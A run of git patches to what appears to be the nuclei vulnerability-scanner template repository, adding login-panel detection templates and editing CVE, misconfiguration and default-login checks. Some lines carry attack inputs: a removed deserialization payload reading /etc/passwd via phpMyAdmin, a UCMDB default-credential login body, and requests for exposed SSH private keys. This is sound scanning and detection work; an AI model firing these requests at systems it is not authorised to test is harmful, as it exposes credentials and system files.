bf798cda414e024e5848d771c6e7550fd8a8949f Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 14:21:07 +0530 Subject: [PATCH 077/370] Update phpmyadmin-wooYun.yaml --- misconfiguration/phpmyadmin-wooYun.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/misconfiguration/phpmyadmin-wooYun.yaml b/misconfiguration/phpmyadmin-wooYun.yaml index 52fa01a388..66767bbddb 100644 --- a/misconfiguration/phpmyadmin-wooYun.yaml +++ b/misconfiguration/phpmyadmin-wooYun.yaml @@ -1,11 +1,11 @@ -id: phpmyadmin-wooYun +id: phpmyadmin-wooyun info: name: phpMyAdmin-WooYun author: dhiyaneshDK severity: high reference: https://rj45mp.github.io/phpMyAdmin-WooYun-2016-199433/ - tags: cve,phpmyadmin,lfi + tags: phpmyadmin,lfi requests: - raw: - | @@ -19,7 +19,6 @@ requests: Content-Type: application/x-www-form-urlencoded Content-Length: 82 - action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} matchers-condition: and From adc3ab0a082c2551d3d355b51c93340164309987 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 08:52:01 +0000 Subject: [PATCH 078/370] Auto Update README [Sat Feb 27 08:52:01 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 6231a04a74..da7b9d286e 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 207 | vulnerabilities | 102 | exposed-panels | 74 | -| exposures | 55 | technologies | 48 | misconfiguration | 48 | +| exposures | 55 | technologies | 48 | misconfiguration | 49 | | workflows | 22 | miscellaneous | 16 | default-logins | 12 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**63 directories, 615 files**. +**63 directories, 616 files**. From 0f27d7767240f2a2d6d4144204f3f316f8c2d2a4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 09:36:07 +0000 Subject: [PATCH 079/370] Auto Update README [Sat Feb 27 09:36:07 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index da7b9d286e..fb66e7e1ee 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 207 | vulnerabilities | 102 | exposed-panels | 74 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | -| workflows | 22 | miscellaneous | 16 | default-logins | 12 | +| workflows | 22 | miscellaneous | 16 | default-logins | 13 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**63 directories, 616 files**. +**64 directories, 617 files**. From b57214bebe72d37ad43429f50e2b222c9c027540 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 15:16:22 +0530 Subject: [PATCH 080/370] Update micro-focus-ucmdb-default-credentials.yaml --- default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml b/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml index 23d8dccad0..25a7fe3f8e 100644 --- a/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml +++ b/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml @@ -10,7 +10,6 @@ requests: - method: POST path: - "{{BaseURL}}/ucmdb-ui/cms/loginRequest.do;" - - "{{BaseURL}}:8443/ucmdb-ui/cms/loginRequest.do;" body: "customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB" matchers-condition: and matchers: From e53752f7d5daadb4f2303bf7848f9bf18acbaed3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 09:50:46 +0000 Subject: [PATCH 081/370] Auto Update README [Sat Feb 27 09:50:46 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index fb66e7e1ee..6303977ebb 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 207 | vulnerabilities | 102 | exposed-panels | 74 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | -| workflows | 22 | miscellaneous | 16 | default-logins | 13 | +| workflows | 22 | miscellaneous | 16 | default-logins | 14 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**64 directories, 617 files**. +**65 directories, 618 files**. From 7d96e1b78537795913ddad9aa35a2fdbe57b8939 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 15:33:13 +0530 Subject: [PATCH 082/370] Update CVE-2020-11853.yaml --- cves/2020/CVE-2020-11853.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2020/CVE-2020-11853.yaml b/cves/2020/CVE-2020-11853.yaml index 8e683f847a..8e2f1ce615 100644 --- a/cves/2020/CVE-2020-11853.yaml +++ b/cves/2020/CVE-2020-11853.yaml @@ -19,7 +19,6 @@ requests: - method: GET path: - "{{BaseURL}}/ucmdb-api/connect" - - "{{BaseURL}}:8443/ucmdb-api/connect" matchers-condition: and matchers: - type: status From 844de61c1ff8964f97740b9499a78ba9bdaf78b2 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 15:36:45 +0530 Subject: [PATCH 083/370] Update CVE-2020-11854.yaml --- cves/2020/CVE-2020-11854.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2020/CVE-2020-11854.yaml b/cves/2020/CVE-2020-11854.yaml index 2cc61de29d..0f5f1bf477 100644 --- a/cves/2020/CVE-2020-11854.yaml +++ b/cves/2020/CVE-2020-11854.yaml @@ -19,7 +19,6 @@ requests: - method: GET path: - "{{BaseURL}}/ucmdb-api/connect" - - "{{BaseURL}}:8443/ucmdb-api/connect" matchers-condition: and matchers: - type: status From fb53dc0d2c28a5545819aa22d1c2f7c2f564bf49 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 15:57:13 +0530 Subject: [PATCH 084/370] Create d-link-wireless.yaml --- exposed-panels/d-link-wireless.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/d-link-wireless.yaml diff --git a/exposed-panels/d-link-wireless.yaml b/exposed-panels/d-link-wireless.yaml new file mode 100644 index 0000000000..9a339ffa48 --- /dev/null +++ b/exposed-panels/d-link-wireless.yaml @@ -0,0 +1,22 @@ +id: dlink-wireless + +info: + name: D-Link Wireless Router Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6784 + +requests: + - method: GET + path: + - '{{BaseURL}}/status.php' + + matchers-condition: and + matchers: + - type: word + words: + - 'D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME' + - 'D-LINK SYSTEMS, INC. | WIRELESS ACCESS POINT | HOME' + - type: status + status: + - 200 From 13024532d8d4fa6300c932059466171721f0edcd Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 15:57:57 +0530 Subject: [PATCH 085/370] Create microsoft-exchange-login.yaml --- exposed-panels/microsoft-exchange-login.yaml | 22 ++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/microsoft-exchange-login.yaml diff --git a/exposed-panels/microsoft-exchange-login.yaml b/exposed-panels/microsoft-exchange-login.yaml new file mode 100644 index 0000000000..e6e6ad8092 --- /dev/null +++ b/exposed-panels/microsoft-exchange-login.yaml @@ -0,0 +1,22 @@ +id: exchange-login + +info: + name: Microsoft Exchange login page + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6739 + +requests: + - method: GET + path: + - '{{BaseURL}}/owa/auth/logon.aspx' + + matchers-condition: and + matchers: + - type: word + words: + - 'Exchange Log In' + - 'Microsoft Exchange - Outlook Web Access' + - type: status + status: + - 200 From dad752f600f74fd5a57f53e317848d8e46fc2092 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 15:58:22 +0530 Subject: [PATCH 086/370] Create jfrog.yaml --- exposed-panels/jfrog.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/jfrog.yaml diff --git a/exposed-panels/jfrog.yaml b/exposed-panels/jfrog.yaml new file mode 100644 index 0000000000..85b4ebc8e4 --- /dev/null +++ b/exposed-panels/jfrog.yaml @@ -0,0 +1,21 @@ +id: jfrog-login + +info: + name: JFrog Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6797 + +requests: + - method: GET + path: + - '{{BaseURL}}/ui/login/' + + matchers-condition: and + matchers: + - type: word + words: + - 'JFrog' + - type: status + status: + - 200 From 437545c104ac5bb824d4baa681b17370fba0d5db Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 15:59:05 +0530 Subject: [PATCH 087/370] Create powerlogic-ion.yaml --- exposed-panels/powerlogic-ion.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/powerlogic-ion.yaml diff --git a/exposed-panels/powerlogic-ion.yaml b/exposed-panels/powerlogic-ion.yaml new file mode 100644 index 0000000000..407b1c3baa --- /dev/null +++ b/exposed-panels/powerlogic-ion.yaml @@ -0,0 +1,21 @@ +id: powerlogic-ion + +info: + name: PowerLogic ION Exposed + author: dhiyaneshDK + severity: low + reference: https://www.exploit-db.com/ghdb/6810 + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'PowerLogic ION' + - type: status + status: + - 200 From cd3c84cdf826ae4908cca8766d6154e809a81f65 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 15:59:38 +0530 Subject: [PATCH 088/370] Create radius-manager.yaml --- exposed-panels/radius-manager.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/radius-manager.yaml diff --git a/exposed-panels/radius-manager.yaml b/exposed-panels/radius-manager.yaml new file mode 100644 index 0000000000..769cf5b94b --- /dev/null +++ b/exposed-panels/radius-manager.yaml @@ -0,0 +1,24 @@ +id: radius-manager-login + +info: + name: Radius Manager Control Panel + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6790 + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/admin.php' + - '{{BaseURL}}/radiusmanager/user.php' + - '{{BaseURL}}/user.php' + + matchers-condition: and + matchers: + - type: word + words: + - 'Radius Manager - User Control Panel' + - type: status + status: + - 200 From 9b714b54ff43ec76872cda375643c14330dde401 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 16:00:13 +0530 Subject: [PATCH 089/370] Create web-local-craft.yaml --- exposed-panels/web-local-craft.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/web-local-craft.yaml diff --git a/exposed-panels/web-local-craft.yaml b/exposed-panels/web-local-craft.yaml new file mode 100644 index 0000000000..20b9387259 --- /dev/null +++ b/exposed-panels/web-local-craft.yaml @@ -0,0 +1,21 @@ +id: weblocal-craft-login + +info: + name: Web local craft Terminal Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6800 + +requests: + - method: GET + path: + - '{{BaseURL}}/home.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'WEB Local Craft Terminal' + - type: status + status: + - 200 From 4920cec545179020582d60b69c23119aeca6d8dd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 10:40:26 +0000 Subject: [PATCH 090/370] Auto Update README [Sat Feb 27 10:40:26 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 6303977ebb..9f369463e4 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 207 | vulnerabilities | 102 | exposed-panels | 74 | +| cves | 209 | vulnerabilities | 102 | exposed-panels | 74 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | -| workflows | 22 | miscellaneous | 16 | default-logins | 14 | +| workflows | 23 | miscellaneous | 16 | default-logins | 14 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**65 directories, 618 files**. +**65 directories, 621 files**. From b1df70651b3fbc065e46c246102a1df69bd65e36 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 27 Feb 2021 17:48:32 +0700 Subject: [PATCH 091/370] Create ssh-secret.yaml --- exposures/configs/ssh-secret.yaml | 34 +++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 exposures/configs/ssh-secret.yaml diff --git a/exposures/configs/ssh-secret.yaml b/exposures/configs/ssh-secret.yaml new file mode 100644 index 0000000000..69322215a2 --- /dev/null +++ b/exposures/configs/ssh-secret.yaml @@ -0,0 +1,34 @@ +id: ssh-secret + +info: + name: SSH Secret + author: pikpikcu + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/.ssh/id_rsa" + - "{{BaseURL}}/.ssh/known_hosts" + - "{{BaseURL}}/.ssh/id_rsa.pub" + - "{{BaseURL}}/.ssh/authorized_keys" + - "{{BaseURL}}/_/.ssh/authorized_keys" + - "{{BaseURL}}/.ssh/known_hosts.old" + + matchers-condition: and + matchers: + + - type: word + words: + - "Content-Type: text/plain" + part: header + + - type: word + words: + - "-----BEGIN RSA PRIVATE KEY-----" + - "ssh-rsa" + part: body + + - type: status + status: + - 200 From c48ebd4d2622adcef3e6bb5d9fed025012f636fb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 10:56:40 +0000 Subject: [PATCH 092/370] Auto Update README [Sat Feb 27 10:56:40 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 9f369463e4..039e2d6638 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 209 | vulnerabilities | 102 | exposed-panels | 74 | +| cves | 209 | vulnerabilities | 102 | exposed-panels | 80 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 14 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**65 directories, 621 files**. +**65 directories, 627 files**. From 54dd6fd413116d59d1072dcffef656ae06b78ccc Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 16:29:59 +0530 Subject: [PATCH 093/370] Update ssh-secret.yaml --- exposures/configs/ssh-secret.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposures/configs/ssh-secret.yaml b/exposures/configs/ssh-secret.yaml index 69322215a2..b5df031461 100644 --- a/exposures/configs/ssh-secret.yaml +++ b/exposures/configs/ssh-secret.yaml @@ -20,13 +20,13 @@ requests: - type: word words: - - "Content-Type: text/plain" + - "Content-Type: text/plain" part: header - type: word words: - - "-----BEGIN RSA PRIVATE KEY-----" - - "ssh-rsa" + - "-----BEGIN RSA PRIVATE KEY-----" + - "ssh-rsa" part: body - type: status From 4986f792896201888e3b1b904f136d86460abd67 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 27 Feb 2021 11:10:05 +0000 Subject: [PATCH 094/370] Update server-private-keys.yaml --- exposures/files/server-private-keys.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/exposures/files/server-private-keys.yaml b/exposures/files/server-private-keys.yaml index 4237df51a3..69cea92e29 100644 --- a/exposures/files/server-private-keys.yaml +++ b/exposures/files/server-private-keys.yaml @@ -18,6 +18,10 @@ requests: - "{{BaseURL}}/id_dsa" - "{{BaseURL}}/.ssh/id_rsa" - "{{BaseURL}}/.ssh/id_dsa" + - "{{BaseURL}}/.ssh/known_hosts.old" + - "{{BaseURL}}/.ssh/authorized_keys" + - "{{BaseURL}}/_/.ssh/authorized_keys" + - "{{BaseURL}}/.ssh/known_hosts" - "{{BaseURL}}/{{Hostname}}.key" - "{{BaseURL}}/{{Hostname}}.pem" @@ -31,6 +35,7 @@ requests: - "BEGIN DSA PRIVATE KEY" - "BEGIN EC PRIVATE KEY" - "BEGIN PGP PRIVATE KEY BLOCK" + - "ssh-rsa" condition: or - type: status From e10b62ddddbd84b3c839ff49b4dfea2ca52f4e41 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 27 Feb 2021 11:11:13 +0000 Subject: [PATCH 095/370] Delete ssh-secret.yaml --- exposures/configs/ssh-secret.yaml | 34 ------------------------------- 1 file changed, 34 deletions(-) delete mode 100644 exposures/configs/ssh-secret.yaml diff --git a/exposures/configs/ssh-secret.yaml b/exposures/configs/ssh-secret.yaml deleted file mode 100644 index b5df031461..0000000000 --- a/exposures/configs/ssh-secret.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: ssh-secret - -info: - name: SSH Secret - author: pikpikcu - severity: info - -requests: - - method: GET - path: - - "{{BaseURL}}/.ssh/id_rsa" - - "{{BaseURL}}/.ssh/known_hosts" - - "{{BaseURL}}/.ssh/id_rsa.pub" - - "{{BaseURL}}/.ssh/authorized_keys" - - "{{BaseURL}}/_/.ssh/authorized_keys" - - "{{BaseURL}}/.ssh/known_hosts.old" - - matchers-condition: and - matchers: - - - type: word - words: - - "Content-Type: text/plain" - part: header - - - type: word - words: - - "-----BEGIN RSA PRIVATE KEY-----" - - "ssh-rsa" - part: body - - - type: status - status: - - 200 From c59c99a92edf5f19236f50177810f3b23e6fe07e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 17:17:45 +0530 Subject: [PATCH 096/370] Update CVE-2018-1335.yaml --- cves/2018/CVE-2018-1335.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-1335.yaml b/cves/2018/CVE-2018-1335.yaml index 0eabe5183d..74fea232e7 100644 --- a/cves/2018/CVE-2018-1335.yaml +++ b/cves/2018/CVE-2018-1335.yaml @@ -4,7 +4,8 @@ info: name: Apache Tika 1.15-1.17 Header Command Injection author: pikpikcu severity: critical - reference: https://www.exploit-db.com/exploits/47208 + reference: https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/ + edb: https://www.exploit-db.com/exploits/47208 tags: cve,cve2018,apache,tika,rce requests: From 6e200c072b5f756f357d0b5698458d810eaf7ee8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 11:48:41 +0000 Subject: [PATCH 097/370] Auto Update README [Sat Feb 27 11:48:41 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 039e2d6638..c69dea17d3 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 209 | vulnerabilities | 102 | exposed-panels | 80 | +| cves | 210 | vulnerabilities | 102 | exposed-panels | 80 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 14 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**65 directories, 627 files**. +**65 directories, 628 files**. From 3d6f9ab259e69495b46902cda4a991c9bdd54e6d Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 17:48:35 +0530 Subject: [PATCH 098/370] Updated workflow --- workflows/dell-idrac-workflow.yaml | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) diff --git a/workflows/dell-idrac-workflow.yaml b/workflows/dell-idrac-workflow.yaml index aa6d7cc29a..8ae4c19f84 100644 --- a/workflows/dell-idrac-workflow.yaml +++ b/workflows/dell-idrac-workflow.yaml @@ -7,8 +7,17 @@ info: workflows: - template: technologies/dell/dell-idrac6-detect.yaml + subtemplates: + - template: default-logins/dell/dell-idrac-default-login.yaml + - template: technologies/dell/dell-idrac7-detect.yaml + subtemplates: + - template: default-logins/dell/dell-idrac-default-login.yaml + - template: technologies/dell/dell-idrac8-detect.yaml - - template: default-logins/dell/dell-idrac-default-login.yaml + subtemplates: + - template: default-logins/dell/dell-idrac-default-login.yaml + - template: technologies/dell/dell-idrac9-detect.yaml - - template: default-logins/dell/dell-idrac9-default-login.yaml + subtemplates: + - template: default-logins/dell/dell-idrac9-default-login.yaml From 214d6899f048fa81a9f58dd6591d5e6e4e144b90 Mon Sep 17 00:00:00 2001 From: PD-Team <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 27 Feb 2021 17:55:59 +0530 Subject: [PATCH 099/370] Rename phpmyadmin-wooYun.yaml to phpmyadmin-wooyun.yaml --- .../{phpmyadmin-wooYun.yaml => phpmyadmin-wooyun.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename misconfiguration/{phpmyadmin-wooYun.yaml => phpmyadmin-wooyun.yaml} (100%) diff --git a/misconfiguration/phpmyadmin-wooYun.yaml b/misconfiguration/phpmyadmin-wooyun.yaml similarity index 100% rename from misconfiguration/phpmyadmin-wooYun.yaml rename to misconfiguration/phpmyadmin-wooyun.yaml From ebe5aa8171d6a58e7b68b6e77328d191233465eb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 18:04:56 +0530 Subject: [PATCH 100/370] Create crush-ftp-login.yaml --- exposed-panels/crush-ftp-login.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/crush-ftp-login.yaml diff --git a/exposed-panels/crush-ftp-login.yaml b/exposed-panels/crush-ftp-login.yaml new file mode 100644 index 0000000000..5767a7b8e6 --- /dev/null +++ b/exposed-panels/crush-ftp-login.yaml @@ -0,0 +1,21 @@ +id: crushFTP-login + +info: + name: CrushFTP WebInterface + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6591 + +requests: + - method: GET + path: + - '{{BaseURL}}/WebInterface/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'CrushFTP WebInterface' + - type: status + status: + - 200 From fa8c3e6f5ebcc9bcb2c3a13e95fbd22d97b5a31d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 18:05:29 +0530 Subject: [PATCH 101/370] Create pi-admin-console.yaml --- exposed-panels/pi-admin-console.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/pi-admin-console.yaml diff --git a/exposed-panels/pi-admin-console.yaml b/exposed-panels/pi-admin-console.yaml new file mode 100644 index 0000000000..5d7922521e --- /dev/null +++ b/exposed-panels/pi-admin-console.yaml @@ -0,0 +1,22 @@ +id: pi-hole-admin-console + +info: + name: Pi-hole Admin Console + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6626 + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/admin/index.php?login' + + matchers-condition: and + matchers: + - type: word + words: + - 'Pi-hole Admin Console' + - type: status + status: + - 200 From 6286f0b263a11fedc51f8ddc8ec09fca42be15b5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 18:06:00 +0530 Subject: [PATCH 102/370] Create plesk-onyx.yaml --- exposed-panels/plesk-onyx.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/plesk-onyx.yaml diff --git a/exposed-panels/plesk-onyx.yaml b/exposed-panels/plesk-onyx.yaml new file mode 100644 index 0000000000..334c420bf9 --- /dev/null +++ b/exposed-panels/plesk-onyx.yaml @@ -0,0 +1,22 @@ +id: plesk-onyx-login + +info: + name: Plesk Onyx login portal + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6501 + +requests: + - method: GET + path: + - '{{BaseURL}}/login_up.php' + + matchers-condition: and + matchers: + - type: word + words: + - 'Plesk Onyx' + - 'Plesk Obsidian' + - type: status + status: + - 200 From 95da49ec1f85f3d9169bf5310621a915f3c78b2e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 18:06:25 +0530 Subject: [PATCH 103/370] Create siteomat-login.yaml --- exposed-panels/siteomat-login.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/siteomat-login.yaml diff --git a/exposed-panels/siteomat-login.yaml b/exposed-panels/siteomat-login.yaml new file mode 100644 index 0000000000..84f69afe88 --- /dev/null +++ b/exposed-panels/siteomat-login.yaml @@ -0,0 +1,21 @@ +id: siteomat-loader + +info: + name: Orpak SiteOmat login portals + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6624 + +requests: + - method: GET + path: + - '{{BaseURL}}/login.htm' + + matchers-condition: and + matchers: + - type: word + words: + - 'SiteOmat Login' + - type: status + status: + - 200 From 15983ac452affa6bebbf1e1485567dbaf09d2609 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 18:07:00 +0530 Subject: [PATCH 104/370] Create vigor-login.yaml --- exposed-panels/vigor-login.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/vigor-login.yaml diff --git a/exposed-panels/vigor-login.yaml b/exposed-panels/vigor-login.yaml new file mode 100644 index 0000000000..b0cdb728e3 --- /dev/null +++ b/exposed-panels/vigor-login.yaml @@ -0,0 +1,21 @@ +id: vigor-login + +info: + name: Vigor Login Page + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6610 + +requests: + - method: GET + path: + - '{{BaseURL}}/weblogin.htm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Vigor Login Page' + - type: status + status: + - 200 From 534e817e03f0c3b082d499154cd75d6a5fe4a44b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 18:07:25 +0530 Subject: [PATCH 105/370] Create vmware-horizon.yaml --- exposed-panels/vmware-horizon.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/vmware-horizon.yaml diff --git a/exposed-panels/vmware-horizon.yaml b/exposed-panels/vmware-horizon.yaml new file mode 100644 index 0000000000..041294a458 --- /dev/null +++ b/exposed-panels/vmware-horizon.yaml @@ -0,0 +1,21 @@ +id: vmware-horizon + +info: + name: VMware Horizon Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6496 + +requests: + - method: GET + path: + - '{{BaseURL}}/portal/webclient/index.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'VMware Horizon' + - type: status + status: + - 200 From 955037af10c9cd4a373e4c1fd6223447d22d7869 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 18:07:48 +0530 Subject: [PATCH 106/370] Create xenmobile-login.yaml --- exposed-panels/xenmobile-login.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/xenmobile-login.yaml diff --git a/exposed-panels/xenmobile-login.yaml b/exposed-panels/xenmobile-login.yaml new file mode 100644 index 0000000000..683cbeb0f7 --- /dev/null +++ b/exposed-panels/xenmobile-login.yaml @@ -0,0 +1,21 @@ +id: xenmobile-login + +info: + name: Xenmobile Console Logon + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6675 + +requests: + - method: GET + path: + - '{{BaseURL}}/zdm/login_xdm_uc.jsp' + + matchers-condition: and + matchers: + - type: word + words: + - 'XenMobile - Console - Logon' + - type: status + status: + - 200 From ca74b3accd667ee35e7e28790f9a970dcb4fb3e2 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 18:08:20 +0530 Subject: [PATCH 107/370] payload update --- cves/2020/CVE-2020-35729.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-35729.yaml b/cves/2020/CVE-2020-35729.yaml index 1f5ac33847..f0af5aa3ab 100644 --- a/cves/2020/CVE-2020-35729.yaml +++ b/cves/2020/CVE-2020-35729.yaml @@ 